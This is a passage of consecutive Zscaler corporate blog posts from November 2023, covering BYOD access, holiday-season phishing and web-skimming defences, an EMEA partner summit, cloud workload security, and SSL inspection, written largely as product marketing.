Trust Exchange, while integrated logging provides deeper visibility. Access to SaaS apps is provided uniquely and seamlessly. Some apps may use legacy authentication methods, but the Zscaler architecture can still ensure MFA (multi factor authentication), so you can adhere to your organization’s security standards. Moreover, users have the flexibility to access apps from any device, be it from a desktop, touch-screen laptop, or even mobile. This architecture also provides application protection. Private web apps are hidden from the internet by the Zero Trust Exchange, reducing their attack surface. Moreover, Isolation obfuscates the application headers and hides away the application’s anatomy, (protocol, OS versions, software components, etc.), further shrinking the attack surface by stopping attackers from using malware-infected, unmanaged devices to exploit these apps. Depending on the use case requirements, Zscaler Browser Access can provide native (non-isolated) access to these apps, as well. Leveraging Zscaler Privileged Remote Access, users can also access internal servers, desktops, jump hosts, and other OT/IT/IoT devices via a web-based RDP/VNC/SSH mechanism through the portal. As per policy configuration, access to systems and devices can be restricted for a specific timeframe. Plus, with session recording capability, admins can perform detailed audits through video recordings and gain deeper insight into the user behavior patterns Zscaler SSE platform Holistically, the Zscaler SSE (Secure Services Edge) platform provides secure access for both managed and unmanaged devices. Get started on your BYOD or B2B journey now! In a nutshell, Zscaler respects an end user’s ideal of keeping their device unmanaged, without requiring an endpoint agent, turbocharging your organization’s BYOD and B2B initiatives. Drop us a line for a quick demo, or sign up for a workshop! We will guide you on your zero trust journey, so you can boost user productivity without compromising security, and accelerate your innovation path. Experience the One True Zero! Fun Fact - BYO has origins as BYOB and it’s suggested that in the early 19th century BYOB was a societal term for “Bring Your Own Basket” at picnics. Thu, 16 Nov 2023 08:00:01 -0800 Amit Jain How to stay protected on the web this holiday season Introduction It should come as no surprise that while online shopping spikes during the holiday season, there is also a marked increase in cyber attacks capitalizing on holiday-themed offers and promotions. Zscaler ThreatLabz has been observing web threats for many years. While the attacks have evolved over time, they share a few commonalities that enable us to recommend how online shoppers (users) can protect themselves and how security teams can safeguard corporate data. This blog examines recurring attack trends during the holiday season and provides key recommendations to protect sensitive information. In addition, this blog explains how Zscaler Advanced Threat Protection mitigates web-based threats like phishing and web skimming. Phishing Attacks Over the years, phishing scams have become more sophisticated, making them harder to detect and block. By leveraging phishing kits and AI tools, even non-technical malicious actors can plan and execute highly targeted phishing campaigns, compromising organizations to access sensitive data for exfiltration and/or extortion. The Zscaler ThreatLabz 2023 Phishing Report indicates that phishing attackers exploit certain consumer trends by impersonating popular brands to deceive consumers. Malicious e-commerce sites and emails are popular phishing tactics during the holiday season because of the heavy online shopping and spending that occurs during this period. A widely employed method of phishing involves using trusted domains to exploit unsuspecting consumers, redirecting them to phishing websites. Malicious actors abuse popular online shopping platforms such as Walmart and Amazon in an attempt to collect login credentials. Attackers send free gift cards via email, post ads, or send fake customer service alerts in an attempt to manipulate victims into clicking on phishing links. In addition to popular online shopping websites, banking and personal finance sites become frequent targets during the holiday season. Some attacks are served over non-secure connections using HTTP and are easy to spot. However, they can also be more elaborate and sophisticated, served over an HTTPS connection with an interface that seems like a legitimate banking and finance website. In 2019, PayPal phishing scams were executed widely by malicious actors. A blog by the Zscaler ThreatLabz team drills into how the threat actors executed the attacks successfully. In recent years, attackers have also engaged in smishing, i.e., using text messages (SMS communications) to deliver scams, typically with malicious URL links. The message sender appears to be a known e-commerce brand or famous online shopping website. A text message with a tracking link might divert a user to a malicious site that looks legitimate. In the past, Zscaler ThreatLabz has observed these seemingly innocuous websites luring unsuspecting users with polls and surveys that promise monetary rewards Web Skimming Attacks Historically, the e-commerce industry sector has faced the brunt of skimming attacks, which focus on capturing sensitive data such as online shoppers’ credit card information. In recent years, web skimming attacks have become increasingly popular among malicious actors, given that they are easy to execute and hard to detect. What makes it even harder to detect these types of attacks is that web skimming attacks are commonly launched over encrypted (SSL) channels and many organizations don’t inspect encrypted traffic. Card skimmer groups are active throughout the year, but given the increased online shopping activity during the holiday season, there usually is a spike in such attacks around this time. Last year, ThreatLabz identified four emerging skimming attacks to watch, with little to no prior documentation in the public domain. The ThreatLabz research team discovered that Magento and Presta-based e-commerce stores in the US, UK, Australia, and Canada were primarily targeted, with attackers managing to keep their malicious activities under the radar for several months. Malicious actors using skimming attacks tend to use newly registered domains that appear similar to any web service or web analytics service to remain undetected for long and infect multiple e-commerce websites. JavaScript skimmer code is hosted on attacker-registered domains, and the link to these skimmers is injected into the compromised e-commerce websites. Sometimes, the skimming attacks rely on heavy use of JavaScript obfuscation, which makes detection even more difficult. Guidelines for Users Shopping on Corporate Devices Users engaging in online shopping should follow the basic guidelines outlined below to protect their personal information and corporate data: Avoid holiday shopping on any corporate device thereby avoiding web threats. If an advertised deal seems too good to be true, it probably is. Be particularly wary of these offers and pay close attention to any associated web pages and links. Download apps from large official app stores, such as Google or Apple, as they generally have stronger governance. Verify the authenticity of the URL or website before accessing it. Be wary of links with typos. When visiting shopping, e-commerce, or financial websites, check for HTTPS/secure connections. All legitimate vendors, retailers, and payment portals use HTTPS connections for their transactions. Enable two-factor authentication, or “2FA,” to provide an additional layer of security, especially for sensitive financial accounts. As a rule, don’t click links or open documents from unknown parties who promise exciting offers and opportunities. Always ensure that your operating system and web browser are up-to-date and have the latest security patches installed. Use a browser add-on, such as Adblock Plus, to block malvertising (compromised/malicious websites bombard visitors with pop-up ads). Avoid using public or unsecured Wi-Fi connections for shopping. Recommendations for Enterprise Security Teams Given the spikes in cyber attacks during the holiday season, it is important to raise user awareness. Leverage the above section on "guidelines for users" to educate your user base. Utilize web policies that restrict access to unknown, miscellaneous, newly registered, and newly active domains. If there are legitimate business use cases for these websites, leverage browser isolation to enable safe access. Turn on SSL/TLS traffic inspection to gain visibility and the ability to apply advanced security controls, such as phishing detection, IPS, and inline sandboxing, to all traffic. If you are an e-commerce company, ensure that your own infrastructure is not exploited by keeping all systems patched and up-to-date, utilizing secure passwords and MFA, and following PCI compliance guidelines. While the above recommendations are critical, especially during the holiday season, improving and maintaining your security posture is important throughout the year, not just during the holiday season. Zscaler Advanced Threat Protection Helps Safeguard Data During the Holidays Traditional threat protection comes with its own downsides: inspecting traffic from start to finish is challenging, appliance-based and VM approaches cannot perform 100% SSL/TLS decryption, traditional sandboxing solutions don't operate inline, which means they can only detect malware after they've compromised your systems and the minute your users drop off the network or VPN, you lose the ability to enforce policies. This is why we recommend Zscaler Advanced Threat Protection. When it comes to phishing attacks, Zscaler Advanced Threat Protection utilizes its cloud-native proxy to inspect web traffic comprehensively. It leverages advanced threat intelligence and behavioral analysis to identify and block malicious websites attempting to deceive users. For combating web skimming, Zscaler Advanced Threat Protection’s approach involves thorough inspection of web content and transactions. By scrutinizing every packet of data, it can detect and block attempts by malicious actors to inject code into legitimate websites. Zscaler’s focus on encrypted traffic means its unlimited SSL inspection capacity allows it to uncover hidden threats within encrypted communication, a common tactic employed by web skimmers. Take a look at how VF Corporation, which includes brands like Timberland, The North Face and Vans, went through a zero trust journey powered by Zscaler enabling them to improve threat protection with threat insights from the world’s largest security cloud. Wed, 15 Nov 2023 09:02:02 -0800 Apoorva Ravikrishnan Channel Reinvented: Highlights from EMEA Partner Summit 2023 Fresh off of a flight and I’m excited to share with you some of the amazing highlights from the EMEA Partner Summit in Alicante, Spain, which took place on November 7-8. This year's summit was an incredible opportunity for us to connect with our partners from around the EMEA region, and gain valuable insights and feedback that will shape the future of our partnership. Throughout the two-day summit, the Zscaler team warmly welcomed over 100 strategic partners to join us for an immersive experience that will for sure go down as one for the books. The summit showcased a range of new initiatives and innovations on the Zscaler Zero Trust Exchange Platform, including cutting-edge technologies like AI, ML, IT/OT. These advancements empower our partners to seize the latest opportunities in the industry and throughout the week we shared strategies around how to unlock new revenue streams, enhance services, and drive remarkable business growth. Undoubtedly, one of the summit's highlights was the chance to shine a spotlight on leaders across every function of Zscaler, from Product Leadership to Solutions Consulting and Professional Services. These executives were present to demonstrate their unwavering support, engage with partners, and present the Zscaler roadmap. It was inspiring to see how partners are threaded through every aspect of our strategy, and how crucial your collaboration is in driving our mutual success. The agenda was also jam-packed with sessions from my leadership team that explored our channel transformation journey and the current state of the channel. We had some amazing discussions with our EMEA sales leadership team on partnership enhancement, collaboration, and growth, and how we have aligned stronger internally to support our partners externally. It was truly inspiring to see how everyone came together in an environment of open dialogue and shared goals - and it was a great time for us to debut several of our new programs from our new partner rebates, spiffs and certification rewards program for sales engineers coming soon! Overall, it was an incredible experience that left us feeling energized and excited for what's to come. In addition to the engaging sessions, we had a blast celebrating our shared success and giving well-deserved recognition to our incredible Channel and Ecosystem Partners - Great Gatsby style! These outstanding partners have truly gone above and beyond in their collaboration with us, and we couldn't be more grateful for their exceptional commitment and dedication. Congratulations to our esteemed winners: EMEA Service Provider of the Year: BT EMEA Systems Integrator of the Year: NTT EMEA Solution Provider of the Year: Softcat EMEA Technology Alliance Partner of the Year: AWS EMEA North Partner of the Year: Computacenter EMEA South Partner of the Year: Verizon EMEA MVP Partner of the Year: Orange EMEA Growth Partner of the Year: Help Information Technology Consultancy EMEA Technical Partner of the Year: Deutsche Telekom EMEA Business Partner of the Year: Serviceware These awards recognize our partners who have demonstrated excellence in their respective categories. These companies have shown exceptional commitment, dedication, and innovation in their partnership with Zscaler, and we are proud to have them as part of our ecosystem. I want to take this opportunity to thank all our partners who joined us at the 2023 EMEA Partner Summit. Your input really is invaluable to us, and we appreciate your commitment to our shared success. I am confident that together, we can continue to drive innovation, growth, and success for our customers. Finally, I want to extend my sincere appreciation to Blanca Gallatero, VP, EMEA Partners & Alliances, and her team for their hard work and dedication in organizing this year's summit. It was a phenomenal event that exceeded all expectations, and we are grateful for your unwavering support. Thank you again for being an integral part of our ecosystem, and I look forward to continuing our partnership in the years to come. Tue, 14 Nov 2023 08:00:01 -0800 Karl Soderlund Extending Zero Trust for Workloads in Google Cloud and China Region Global enterprise organizations are rapidly expanding their application footprints across multiple public clouds to leverage the unique capabilities of each cloud provider and mitigate lock-in risks. However, this multicloud adoption significantly expands the security risks. Unfortunately, legacy security architectures that retrofit on-premises models for multicloud are outdated and obsolete. To address these challenges, Zscaler has extended its zero trust architecture to provide secure connectivity for the cloud workloads in Amazon Web Services (AWS) and Microsoft Azure. Today, we announce the availability of our Zscaler workload communications in the Google Cloud Platform, Azure public clouds in the China region, and AWS GovCloud along with our FedRamp certification. Customers can now confidently extend their deployments and benefit from the world’s largest inline cloud security platform with consistent security and segmentation policies. China Region Support Many industries such as technology, life sciences, and financial services are undergoing accelerated business transformations. They require deploying application workloads in public clouds closer to their employees for enhanced innovation and productivity. As organizations tap into the global footprint for resources and talent, we see a rapid rise in expansion into countries like China. They aim to provide consistent access and user experience to employees, regardless of their location. However, deploying workloads in public clouds for the China region poses the following challenges: Strict Great Firewall inspection (GFW) Random bandwidth throttling Spurious DNS injections for compliance enforcement Poor connectivity often with high packet loss and latency In response, Zscaler launched China premium access to help customers with enhanced connectivity and security. Many of our customers sought an extension of zero trust architecture for workloads deployed in public cloud regions of China, especially Microsoft Azure. Today, with this announcement, customers can now seamlessly extend cloud workloads to Azure Beijing and Hebei regions with the benefits of: Purpose-built workload communications for China regions adhering to all local compliance mandates Centralized and granular policy for workload egress traffic to domestic China or an international website Additional monitoring to maintain the country-specific risk and compliance requirements GCP Support Business transformation acceleration is happening across industry verticals with the adoption of modern application frameworks like microservices, serverless, and the new epoch of applications with Generative AI. One of Zscaler’s largest financial services customers embarked on a multicloud expansion with workloads deployed in Azure and GCP. Key drivers for the expansion were: Adopting GCP’s shared VPC architecture with granular workload egress security Enhancing the website chatbots based on Gen AI co-pilot with better security Extending threat protection and SSL inspection capabilities This customer has now deployed Zscaler Workload Communications in Azure and GCP with the single shared VPC and centralized infrastructure design. This flexible design enables workload deployments across multiple regions. They have benefited from minimal changes to existing network routing configurations, advanced policy-based SSL inspection, and strict data protection policies with inline SSL decryption for full visibility into Gen AI user queries and downloaded content. In summary, these innovations and platform expansion for Zscaler Workload Communications will significantly improve business agility, end-user experience, and security for our customers’ workloads in multicloud. To learn more about the capabilities of Workload Communications, visit the product page here. Watch our launch event to hear more about our extended cloud support here. Wed, 08 Nov 2023 04:00:01 -0800 Sreekanth Kannan How to Enable User-Defined Tags as Identity for Securing Cloud Workloads Public cloud environments often contain dynamic workloads, with instances created and deprecated frequently. As applications transition to the cloud, it's crucial that they have the same protection as they would in an on-premises data center. In data centers, identity (as it applies to security policy) is closely linked to static elements like hostnames, subnets, and IP addresses. However, the elastic nature of the public cloud can make static approaches challenging, potentially leading to business delays and increased security risks. Protecting workloads in the cloud requires dynamic policy constructs for workload identification, and for this, cloud native attributes and user-defined tags are effective tools. Attributes offer deterministic methods for managing workloads, such as OS type, VPC ID, subnet ID, and security group ID. However, tags are particularly interesting due to their customizability, mature enforcement capabilities, and widespread usage among customers. These tags/attributes are key–value pairs associated with each cloud resource. As user-defined tags have developed, security teams have sought ways to incorporate them into security policies. Some security solutions can use tags in security policies, but operationalizing tags in these solutions is challenging due to: Limited scalability Challenges in cross-account deployments Difficulties in supporting overlapping IP address space Announcing zero trust security for cloud workloads using cloud native tags and attributes Zscaler Workload Communications is the modern approach to securing your cloud applications and workloads. With secure zero trust cloud connectivity for workloads, you can eliminate your network attack surface, stop lateral threat movement, avoid workload compromise, and prevent sensitive data loss. It uses the Zscaler Zero Trust Exchange™ platform to secure cloud workloads, enabling your organization to stop malicious access with explicit trust-based security that leverages identity, risk profiles, location, and behavioral analytics. We’re pleased to announce support for AWS user-defined tags and attributes in security policies within the Zero Trust Exchange. Customers can apply security policies to cloud workloads using the tags and attributes associated with those workloads. There are three main components to the solution 1. Workload Discovery service This Zscaler-managed service finds workloads and corresponding tags/attributes in an AWS account associated with AWS resources like VMs, VPC, Subnets, and ENI. Customers don't need to install any additional components in their AWS account. The service discovers tags per AWS region and can be targeted to the regions where workloads are located. Permissions are configured via the Zscaler administration portal, enabling AWS accounts to be onboarded in minutes. Once onboarded, all tags and their associated workloads in an account are discovered and ready to be used in Zscaler security policies. The service supports both pull and push modes for tag discovery. Figure 1 shows the Workload Discovery service operating in Zscaler's AWS account, identifying the workloads in Acme Corp’s AWS account. Figure 1: Workload Discovery service 2. Tag metadata propagation Once identified, user-defined tags, attributes, and associated workload information is automatically transmitted to the Cloud Connectors linked with the corresponding AWS account. Cloud Connectors are lightweight virtual machines that act as traffic forwarding gateways in customer VPCs/accounts. They securely tunnel the egress traffic from workloads to the Zero Trust Exchange, where security policies are applied. Customers can leverage both Zscaler Internet Access™ (ZIA™) and Zscaler Private Access™ (ZPA™) policies to protect workload communications with public applications on the internet or private applications in the same or different cloud/region. Zscaler provides and maintains the OS and software for these connectors. Figure 2 shows how the Workload Discovery service propagates the tag and associated workload information to Cloud Connectors linked to Acme Corp’s AWS account. This metadata contains the IP address, the key–value pairs for user-defined tags and attributes, and other information needed to identify the workload. Figure 2: Tag metadata propagation 3. Rules engine Tags- or attributes-based security policies are incorporated into the Zero Trust Exchange platform’s rules engine. A new policy object has been introduced to group one or more tags or attributes together. Customers can now utilize logical Boolean operators to create a workload group and apply policies accordingly. As shown in figure 3, a user creates a workload group for API servers in a production environment (Tag-Name=App, Tag-Value=Api) & (Tag-Name=environment, Tag-Value=production). This user can then configure security policies for this group. Figure 3: Creating a group of API servers in a production environment Figure 4 demonstrates a user creating a policy to apply URL filtering to this group of API servers in the Zero Trust Exchange rules engine. Figure 4: Zero Trust Exchange Rules Engine Extension This includes support for advanced security policies like SSL inspection, URL classification (for Domain and Path), data loss prevention, and firewall policies with AppID. These capabilities enable granular and consistent application of security policies in dynamic cloud environments A simpler alternative for managing security in cross-account deployments with overlapping IP addresses The gateway load balancer (GWLB) VPC endpoints offer the ability to direct workload traffic from a workload VPC to a central security VPC. This is achieved without the need for transit gateway (TGW) or VPC peering by using the AWS PrivateLink service. The workload and security VPCs can exist in the same or different AWS accounts. This arrangement can simplify cloud deployments by centering egress traffic in a single security VPC, eliminating the need to configure TGW attachments for each workload VPC. It can also reduce the AWS data charges. Moreover, GWLB VPC endpoints enable workload VPCs with overlapping IP addresses to connect to the same central VPC. Zscaler's tagging support can seamlessly address both of these situations. Customers can apply tag/attributes-based policies for cross-account architectures and overlapping IP address scenarios. This ensures that the right policies are applied to the intended workloads Enhanced protection at cloud scale, offering both granularity and flexibility 1. Cloud native scale Zscaler supports the maximum number of tags allowed by the cloud service provider, including individual resource-level tags as well as VPC and subnet tags. In situations where SecOps/DevOps teams cannot fully enforce tags, Zscaler supports the use of provider-generated attributes. These attributes (VPC ID, Subnet ID, Security Group, etc.) can also be used in security policies. 2. Flexibility As cloud deployments evolve, many customers utilize a mix of (a) distributed and/or centralized security, (b) single- and/or multi-account architecture, and (c) unique and/or overlapping IP addressing. Zscaler's approach is compatible with all these combinations. 3. Advanced security capabilities Tags can be used across the Zero Trust Exchange platform’s suite of services, including advanced security features such as: SSL inspection and URL filtering, which supports both domain and path Advanced firewall policies to protect web and non-web traffic using network applications, network services, and destination domains, among others Comprehensive inspection with DLP, supporting Exact Data Match (EDM), Indexed Document Match (IDM), and Optical Character Recognition (OCR) Securing workloads in the public cloud requires a scalable, adaptable solution that can apply consistent policies based on workload identity. This latest addition to Zscaler Workload Communications product suite allows you to apply security policies using cloud service provider tags and attributes. Natively integrated with the Zero Trust Exchange, this capability is available to all Zscaler customers, without any need to deploy additional components. To find out more, visit our product webpage and watch the webinar. Wed, 08 Nov 2023 04:00:01 -0800 Mrigank Singh Unleashing the Power of the Largest Security Cloud for High-Performance SSL Inspection of Cloud Workloads In the dynamic and evolving landscape of cloud-based workload traffic, Secure Sockets Layer (SSL) encryption is a critical pillar as it comprises a staggering 90% of all internet traffic, and an even higher number (96%) of all workload egress traffic. While SSL encryption safeguards data transfer, it also provides an ideal channel for malicious actors to export data without detection by security devices. This has led to a growing concern and need for SSL inspection for egress traffic. The security and performance challenge SSL inspection often relies on customized compute infrastructure to ensure consistent traffic performance. This is because hardware offloading components are necessary for decrypting and re-encrypting SSL sessions to enable deeper levels of inspection. Cloud providers offer FPGA versions that can be used for hardware offloading required for SSL decryption/encryption. However, these FPGA-based instances are expensive (around 5 times the cost of similar non-FPGA instances) and may demonstrate unpredictable performance for high throughput inspection. On the other hand, security appliances like virtual Next Generation Firewalls (NGFWs) using standard instance types experience a significant drop in performance when SSL inspection is enabled, with performance degradation of up to 60%. Modern cloud-native applications are designed in a modular fashion using microservices architecture. These applications take advantage of the SAAS solutions available for various components such as analytics, logging, workflows, authentication, software updates, LLM models, and more. These services are offered by SAAS platforms like Dynatrace, Datadog, ServiceNow, Okta, OpenAI, and others. Moreover, software updates from open-source repositories such as Python, Java, Linux, FreeBSD, and Ubuntu are crucial for patching vulnerabilities and keeping applications up to date. Consequently, modern cloud-native applications generate a significant amount of egress traffic that is destined for diverse destinations. To ensure secure communication for these applications, it is essential to perform a thorough and comprehensive inspection of outbound traffic that necessitates SSL inspection. Image 1: Workload egress traffic destined for diverse destinations Public clouds, being distributed globally, have made it possible for enterprises to deploy applications in closer proximity to their users. It is common for applications to be deployed in multiple regions to cater to nearby users. Furthermore, each business unit may have its own account or subscription for the purpose of cost allocation. As a result, network and security teams are now faced with the challenge of managing and rotating SSL certificates for security appliances across multiple regions, accounts, and subscriptions. This responsibility of certificate management and rotation becomes even more burdensome as the number of virtual NGFW appliances continues to grow. To add further complexity, not all applications are compatible with SSL inspection. Applications that have certificate pinning enabled or legacy applications that cannot trust an intermediate certificate may terminate their connections when SSL inspection is enabled. Additionally, certain application vendors like Microsoft and Zoom do not recommend decrypting egress traffic for specific applications due to network connectivity principles or latency sensitivity. This necessitates the need for more precise controls to inspect SSL traffic for desired applications. When enabling SSL inspection, security operations (secops) teams need to enforce foundational SSL encryption parameters. These parameters include minimum encryption levels, preferred encryption methods, desired encryption strength, and minimum protocol version. Customers in highly regulated industries are obligated to adhere to stringent security and privacy requirements. This often involves demonstrating the use of the most secure SSL parameters while inspecting application traffic. Therefore, they require a method to retrieve SSL inspection parameters, including encryption levels, methods, strength, and protocol version information, from the security vendor or device responsible for SSL inspection. Customers are seeking a solution that can provide SSL inspection with consistent performance, is easy to use, and supports versatile deployments The Power of High-Performance SSL Inspection To tackle this crucial security challenge, Zscaler provides high-performance SSL inspection for application egress traffic at cloud scale, ensuring no drop in performance. Zscaler's solution is compatible with cloud native components like AWS Gateway Load Balancer (GWLB), Azure Internal Load Balancer, and GCP internal load balancer. It can scale up to handle the maximum throughput supported by these cloud native components while maintaining optimal performance. The Zscaler Zero Trust Exchange platform utilizes specialized infrastructure across its 150+ data centers to perform SSL inspection at scale for globally-distributed customer traffic. For customers using Zscaler Workload Communications to enable zero trust for cloud workload traffic, Zscaler provides a cloud connector. This cloud connector is a virtual machine (VM) that acts as a forwarding gateway to Zscaler's Zero Trust Exchange. These VMs can be scaled vertically or horizontally to securely tunnel workload traffic from public clouds to Zero Trust Exchange for SSL inspection. The Zero Trust Exchange processes and protects over 350 billion transactions per day, with 90% of these transactions being SSL encrypted. Image 2: SSL inspection performed at scale in Zscaler’s Zero Trust Exchange Zscaler’s approach to SSL inspection is based on five key pillars that maximize security and ensure cloud-scale performance: Image 3: 5 pillars of SSL inspection Pillar 1: The right architecture for scale Your SSL inspection solution must be able to scale and decrypt 100% of traffic without any impact on throughput or latency. There can be no compromises in this area. High throughput and low latency are crucial for maintaining consistent application performance and enabling SSL inspection for all network traffic. Inspecting all network traffic is essential to avoid any blind spots in your cloud egress protection. This is where capacity-constrained legacy NGFW appliance vendors suffer the most and compromise either on coverage or throughput. To illustrate their struggle, it’s not uncommon to see legacy NGFW vendors publish deployment best practices for decrypting only “high risk” URL categories, while trusting the others: These constraints put customers in a precarious scenario in which risk can go unchecked, unmanaged, and unmitigated. The best way to achieve high scale is through a multitenant and purpose-built solution with custom-built SSL-accelerated hardware. Pillar 2: Easy-to-use In an ideal world, customers would just flip an SSL switch and everything would automatically work. In reality, risks due to various compliance regulations and incompatible applications need to be managed for a successful rollout. The top operational feature is a robust, rule-based SSL inspection that allows you to pick and choose which traffic gets inspected and which traffic gets exempted, based on traffic source and destination. The following is a great example of how Zscaler includes extensive options for configuring rules: Image 4: Multiple filters/criteria enable flexible and granular SSL inspection policies The Zscaler SSL rule engine supports over a dozen criteria, allowing the secops / netops teams to selectively enable SSL inspection for a subset of workload traffic. For example: Managing SSL inspection levels based on varying data privacy regulations Managing SSL inspection levels based on accounts/subscriptions/projects, VPCs/VNETs/subnets Managing SSL inspection levels based on user-defined tags and cloud provider attributes Excluding legacy applications from SSL inspection Enabling SSL inspection in a staggered manner for a smoother rollout and adoption For multi-cloud deployments that include AWS, Azure, and Google Cloud regions, network and security teams have the flexibility to enable SSL inspection for: All clouds and regions All workloads in a specific cloud, for e.g. AWS All workloads in a VPC or VNET Specific workload in a VPC or VNET’s subnet Image 5: SSL inspection applied at varying application scope Pillar 3: Secure decryption When opening up encrypted SSL traffic, it is vital that the security of the end-to-end connection is not sacrificed and that all sensitive cryptographic key material is safely handled according to industry best practices. Pillar 3a: Optimized cipher suites and TLS version selection This tends to be overlooked due to the complex nature of cipher suite variants. The SSL inspection solution must guarantee that cipher suite strength is equivalent to, or stronger than what is negotiated without SSL inspection. For example, if a client machine? proposes a perfect forward secret (PFS) cipher suite such as ECDHE_RSA_WITH_AES_256_CBC_SHA384), the SSL proxy needs to prefer it over weaker static RSA ciphers. The Zscaler design principle aims to make this process as simple and secure as possible. Zscaler chooses the strongest cipher advertised by the workload and always proposes a strength-prioritized list of cipher suites to the server, even if it results in additional cryptographic computation overhead. The following illustrates this principle through the Zscaler TLS 1.3 acceleration hardware upgrade that was completed in December 2021. Once this was launched, our customers observed, overnight, a major difference in TLS version negotiation both on their client side and server side. This significant upgrade was seamless for our customers across the board. Imagine the substantial operating efforts needed to manually instance types, OS, and drivers on virtual security appliances in order to achieve similar results. Pillar 3b: Key Material Safeguarding Zscaler offers two intermediate Certificate Authority (CA) enrollment models: bring-your-own CA and the Zscaler default root/intermediate CA. For the first option, Zscaler acts as a key custodian on behalf of a customer and assumes responsibility to protect it. While the widespread adoption of perfect forward secrecy (PFS) ciphers has mitigated the risk of passive eavesdropping, an active MITM attack is still possible. Issuing a CA private key is like issuing a key to the kingdom. If a bad actor gets ahold of a private key, they can issue arbitrary forged certificates for trusted domains. In combination with DNS poisoning, the bad actors can launch MITM attacks using certificates that appear trusted to the client. To mitigate this risk, Zscaler employs a robust array of key material safeguarding techniques - from short-lived keys and revocation endpoints to stringent production access and audit, along with other compensatory management, operational, and technical safeguards. The highlighted CA below (t stands for temp), showcases Zscaler’s short-lived issuing CA that is automatically rotated on a weekly basis, significantly minimizing potential attack windows. To further advance key protection, even for the most highly regulated and security-stringent organizations, Zscaler recently launched a first-of-its-kind turnkey Cloud HSM (FIPS 140-2 Level 3 validated) solution for safeguarding our customers issuing CA private keys—the industry gold standard for key protection. In the fully integrated solution, the CA private key will reside for its entire lifetime inside the Cloud HSM and be used dynamically to sign domain certificates. Pillar 4: Design for privacy Opening up an SSL connection that was supposed to preserve privacy inherently introduces risk to privacy. The right architecture mitigates this risk. Security and privacy are at the core of the Zscaler architecture. Our fundamental principle is that we should minimize the data sets that are collected and secure them across the whole lifecycle; in-use, in-motion and at-rest. Don’t just take our word for it, all our information security controls are validated by independent third party assessors against all the leading compliance and data privacy frameworks, including DOD IL5 which is the US Department of Defense highest standard for cloud vendors. Zscaler also undergoes an independent Sensitive Data Handling Assessment that verifies documented encryption controls and client key management, while also validating that any stored key information is unexploitable through an examination of activity logs, core dump files, and database schemas. To learn more visit here Pillar 5: Visibility Comprehensive operational visibility is vital for both establishing trust and addressing several key questions: What is your SSL inspection coverage? Are there any problems due to incompatible apps? Are you observing any obsolete TLS versions? Are you using the most secure ciphers? What value are we getting from the SSL inspection (i.e. threats, DLP incidents)? The foundation to address these questions starts from the raw log data. A robust logging plane capable of capturing high-fidelity and context-rich transaction-level logs at scale (not aggregate level that other vendors may resort to due to architectural deficiencies) is imperative. Zscaler’s Nanologs capture 18+ unique TLS log fields for each TLS connection (decrypted, undecrypted, and failed) as seen here: Once you have the basics in place, answering the operational and value questions is straightforward. Example 1: Failed client SSL handshake logs proactively surface misbehaving clients: Conclusion Zscaler's platform enables scalable SSL inspection, capable of handling the throughput supported by cloud-native egress solutions without sacrificing performance. SSL inspection at scale is a crucial capability to protect workloads and application data, but since the original protocol was not designed to be inspected by a trusted third party, it also introduces risk. Zscaler acknowledges and mitigates these risks through its purpose-built cloud-native security platform following five fundamental principles. Given that over 90% of Internet traffic is now encrypted, and malicious actors that include insider threats have leveraged the privacy provided by SSL to disseminate malware and exfiltrate data, inspecting this traffic at scale becomes critical for preventing compromise and data loss, along with improving survivability in the current threat landscape. While there are risks associated with performing SSL inspection, Zscaler has implemented controls, as outlined in this article, that has made this an acceptable level of risk for over 7,000 global customers. To find out more, visit our product webpage and watch the webinar. Wed, 08 Nov 2023 04:00:01 -0800 Mrigank Singh